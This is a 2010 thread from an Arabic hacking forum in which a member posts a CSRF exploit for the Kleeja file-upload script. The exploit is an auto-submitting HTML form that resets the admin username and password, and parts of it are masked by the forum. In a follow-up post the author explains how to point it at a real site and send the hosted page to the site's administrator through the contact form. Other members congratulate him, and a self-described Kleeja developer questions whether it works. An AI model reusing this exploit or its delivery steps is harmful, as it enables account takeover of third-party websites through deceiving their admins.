العودة   :: Security امان العرب Arab :: > The real World Of Hacking & Security > [ الـثـغـرات ] > [ ثــغـرات الأعــضــاء]

[ ثــغـرات الأعــضــاء] قسم خاص باكتشافات الاعضاء

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 08-12-2010, 05:46 PM   المشاركة رقم: 1
الكاتب
koltn
.:: عضو ::.
 
الصورة الرمزية koltn
المعلومات  
التسجيل: Dec 2008
العضوية: 3767
الدولة: Riyadh
المشاركات: 36
بمعدل : 0.01 يوميا
الإتصال koltn غير متواجد حالياً


المنتدى  
Thumbs up ثغـرة Kleeja Upload - CSRF

السـلام عليكم ورحمـه الله وبركآتـه
كل عام وانتم بخير

كيفكم ياحلوين !!

ان شاء الله بصحة وسلامة

جبت لكم ثغرة بـ سكربت الرفع كليجا انا مكتشفها
وظيفتها تغير باسورد الادمن

كود PHP:
# Exploit Title: Kleeja Upload - CSRF Change Admin Password  

# Date: 11-08-2010  

# Author: KOLTN & KoLtN@HoTMaiL.CoM  

# Software Link: http://www.kleeja.com  

# Software Download: http://www.kleeja.com/download/  

# Type : CSRF  

# Version: all Version  

# Greetz to : Juba & Mushii  

#####################Exploit Change Admin Password##########################  

<html>  

<
form method="post" action="http://localhost/kleeja/admin.php?cp=users&page=0">  

<
input type="****" ****="nm_1" value="KoLtN"/>  

<
input type="****" ****="ml_1" value="KoLtN@hotmail.com"/>  

<
input type="password" ****="ps_1" value="123456"/>  

<
input ****="ad_1" type="checkbox" checked="checked"/>  

<
input type="checkbox" ****="del_1" value="1"/>  

<
input class="button2" ****="submit" type="submit"/>  

**********  

********.
getElementById('submit').click();  

</script>  

</form>  

</****>  

</html>  

#####################Exploit Change Admin Password##########################  

   

Ramadan Kareem !! 
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]

بالتوفيـق بالاختراقات

برب فطور












توقيع : koltn

koltn@Hotmail.com
Njj@Hotmail.com

عرض البوم صور koltn   رد مع اقتباس

قديم 08-12-2010, 05:56 PM   المشاركة رقم: 2
الكاتب
michel scofeld
.:: مشرف قسم الاستفسارات ::.
 
الصورة الرمزية michel scofeld
المعلومات  
التسجيل: Aug 2009
العضوية: 21690
المشاركات: 1,254
بمعدل : 0.37 يوميا
الإتصال michel scofeld غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

يآليــت توضيــح












توقيع : michel scofeld


Syria ... in our Hearts

(( يَا أَيُّهَا الَّذِينَ آمَنُوا إِنْ تُطِيعُوا الَّذِينَ كَفَرُوا يَرُدُّوكُمْ عَلَى أَعْقَابِكُمْ فَـتـنْـقَلِبُوا خَاسِرِينَ ( 149 ) بَلِ اللَّهُ مَوْلاكُمْ وَهُوَ خَيْرُ النَّاصِرِينَ ))

عرض البوم صور michel scofeld   رد مع اقتباس

قديم 08-12-2010, 05:58 PM   المشاركة رقم: 3
الكاتب
BaD-HaCKeR-MaN
طاقم الاداره
 
الصورة الرمزية BaD-HaCKeR-MaN
المعلومات  
التسجيل: Jul 2010
العضوية: 61049
الدولة: ام الدنيا ... مصر
المشاركات: 1,503
بمعدل : 0.49 يوميا
الإتصال BaD-HaCKeR-MaN غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

جميل اخى
لكن عند تطبيق الثغرة على احد المواقع ظهرت هذة الرسالة

تحذير : هذه نسخه تطويريه لإكتشاف الأخطاء وفحص السكربت , لا تستخدمها على موقع حي !!
This version is only for testing and development , YOU CAN NOT use it for live site












توقيع : BaD-HaCKeR-MaN

ربنا افرغ علينا صبراا و توفنا مسلمين

كود PHP:
https://www.facebook.com/TheMostCompleteHackerInTheWorld 
عرض البوم صور BaD-HaCKeR-MaN   رد مع اقتباس

قديم 08-12-2010, 06:20 PM   المشاركة رقم: 4
الكاتب
koltn
.:: عضو ::.
 
الصورة الرمزية koltn
المعلومات  
التسجيل: Dec 2008
العضوية: 3767
الدولة: Riyadh
المشاركات: 36
بمعدل : 0.01 يوميا
الإتصال koltn غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

اقتباس:
يآليــت توضيــح
اقتباس:
جميل اخى
لكن عند تطبيق الثغرة على احد المواقع ظهرت هذة الرسالة

تحذير : هذه نسخه تطويريه لإكتشاف الأخطاء وفحص السكربت , لا تستخدمها على موقع حي !!
This version is only for testing and development , YOU CAN NOT use it for live site
اخواني آسف حطيتها على اتكم فآهمين لـ ثغرات الـ CSRF
بشرحها لكم شرح بسيط

اول شي بدل الرابط
كود PHP:
http://localhost/kleeja/admin.php?cp=users&page=0 
برابط الموقع اللي مركب السكربت وتبغى تخترقـه

حلو

حط الباسورد اللي تبيه واليوزر والايميل
وارفعها على اي موقـع
وارسلها لـ admin الموقـع
وتقدر ترسلها عن طريق السكربت فيه خيار " اتصل بنا "
اذا فتحها الادمن بيتغير اليوزر والباسورد

ان شاء الله فهمتوا












توقيع : koltn

koltn@Hotmail.com
Njj@Hotmail.com

عرض البوم صور koltn   رد مع اقتباس

قديم 08-12-2010, 06:55 PM   المشاركة رقم: 5
الكاتب
طالب متحمس
.:: عضو مميز ::.
 
الصورة الرمزية طالب متحمس
المعلومات  
التسجيل: Mar 2008
العضوية: 457
المشاركات: 933
بمعدل : 0.24 يوميا
الإتصال طالب متحمس غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

مبروك اخوي على الاكتشاف لو خليتها في اكتشافات الاعاضاء افضل












عرض البوم صور طالب متحمس   رد مع اقتباس

قديم 08-12-2010, 06:59 PM   المشاركة رقم: 6
الكاتب
محارب هكر
.:: لا اله الا اللهـ ::.
 
الصورة الرمزية محارب هكر
المعلومات  
التسجيل: Feb 2009
العضوية: 9225
الدولة: RooT@SeRvEr [~]#
المشاركات: 1,893
بمعدل : 0.53 يوميا
الإتصال محارب هكر غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

مبروك كولتن

طالة الغيبه












توقيع : محارب هكر

دقت أجراس الرحيل ... الى لقاء قريب بإذن الله


تسجيل خروج ،

2009 / 2012


www.tvquran.com
عرض البوم صور محارب هكر   رد مع اقتباس

قديم 08-12-2010, 07:08 PM   المشاركة رقم: 7
الكاتب
BiG-HaCker
.:: عضو مميز ::.
 
الصورة الرمزية BiG-HaCker
المعلومات  
التسجيل: Jan 2009
العضوية: 8265
الدولة: KuWaiT
المشاركات: 1,119
بمعدل : 0.31 يوميا
الإتصال BiG-HaCker غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

الف مبروك

اكشتاف قوي

وموفق خير












عرض البوم صور BiG-HaCker   رد مع اقتباس

قديم 08-12-2010, 07:18 PM   المشاركة رقم: 8
الكاتب
koltn
.:: عضو ::.
 
الصورة الرمزية koltn
المعلومات  
التسجيل: Dec 2008
العضوية: 3767
الدولة: Riyadh
المشاركات: 36
بمعدل : 0.01 يوميا
الإتصال koltn غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

اقتباس:
مبروك اخوي على الاكتشاف لو خليتها في اكتشافات الاعاضاء افضل
الله يبارك فيك
آسـف ماشفت القسم والله
ان شاء الله ينقلونه المشرفين

اقتباس:
مبروك كولتن

طالة الغيبه
الله يبارك فيك حبيبي
نشوفك على المسـن

اقتباس:
الف مبروك

اكشتاف قوي

وموفق خير
حياك الله والله يبارك فيك












توقيع : koltn

koltn@Hotmail.com
Njj@Hotmail.com

عرض البوم صور koltn   رد مع اقتباس

قديم 08-12-2010, 07:47 PM   المشاركة رقم: 9
الكاتب
H3x H4Ck3R
.:: DeveloPer Plus ::.
 
الصورة الرمزية H3x H4Ck3R
المعلومات  
التسجيل: Oct 2009
العضوية: 37115
الدولة: usr/src/Linux/
المشاركات: 1,647
بمعدل : 0.49 يوميا
الإتصال H3x H4Ck3R غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

اكتشاف حلو ياملعم

لكن لو نزلتها بقسم ثغرات الاعضاء

يكون أحسن












توقيع : H3x H4Ck3R

[#]..LoNG L!v3 Ar4b!4N GuLF..[#]

كود:
,,__ .. .. / o._) .---. /--'/--\ \-'|| .----. .' '. / \_/ / | .' '..' '-. .'\ \__\ __.'.' .' “-._ )\ | )\ | _.' // \\ // \\ ||_ \\|_ \\_ '--' '--'' '--' [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]
حينما أكتب رد فلست مسؤلاءً عن فهمك وتأويلك له ؛ حاولوا أن تبتعد عقولكم عن فكرة أن هنالك من يحاول يستفزك
عرض البوم صور H3x H4Ck3R   رد مع اقتباس

قديم 08-12-2010, 10:25 PM   المشاركة رقم: 10
الكاتب
الطارق
.:: عضو جديد ::.
المعلومات  
التسجيل: Jun 2009
العضوية: 15944
المشاركات: 13
بمعدل : 0.00 يوميا
الإتصال الطارق غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

هل تعرف ان السكربت عربي ؟؟؟؟

انت من اهل القصيم !! تعرف الكليجا


الصراحة اعتب على مستر سفاح .. المفروض ما يرضى بتواجد مثل هالمواضيع هنا لكن اظن انه لا يعرف مع علمك بانك تتحدث عن النسخة السابقة rc6 وحقيقة لم اقم بتجربة او تحليل هذه الثغرة لكن على افتراض انه فعلاً فيه ثغرة راح يتم اتخاذ اللازم .. اقول لك هالكلام بصفتي احد مطوري كليجا ..

مع علم الجميع بانه في النسخة التطويرية التحميل من هنا [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل] لا اعتقد ان ثغرتك ستعمل بها والسبب انه تم عمل حماية لعضوية الآدمن

لي رجعة اذا رأيت ان الموضوع يستحق !!












عرض البوم صور الطارق   رد مع اقتباس

إضافة رد

مواقع النشر (المفضلة)

الكلمات الدلالية (Tags)
ثغرة, kleeja, upload


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغرة رفع شل : upload super beta v1.3 Remote Shell Upload Vulnerability sec syria [ videos & مكتبة الفديو ] 10 07-31-2013 11:14 PM
[WS] upload Remote File Upload Vulnerability ViRuSMaN [ ثــغـرات الأعــضــاء] 5 01-11-2010 08:40 AM
سكربت مركز التحميل kleeja الاصدار RC5 تقدر توصله بقاعده البيانات MODE.KSA [ تـطـويـر الـمـواقـع والـمـنـتـديـات ] 0 10-01-2009 01:16 PM
ثغـرة متصفـح <== ie6 & ie7 мr.khaLodi [ اختراق الاجـهـزه والايـمـيـلات ] 27 02-19-2009 03:31 PM
doop CMS <= 1.4.0b (CSRF/Upload Shell) Multiple Remote Vulnerabilities Ghost Hacker [ الـثـغـرات ] 2 02-16-2009 05:57 PM


الساعة الآن 07:48 AM.


Powered by vBulletin® Version 3.8.3
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.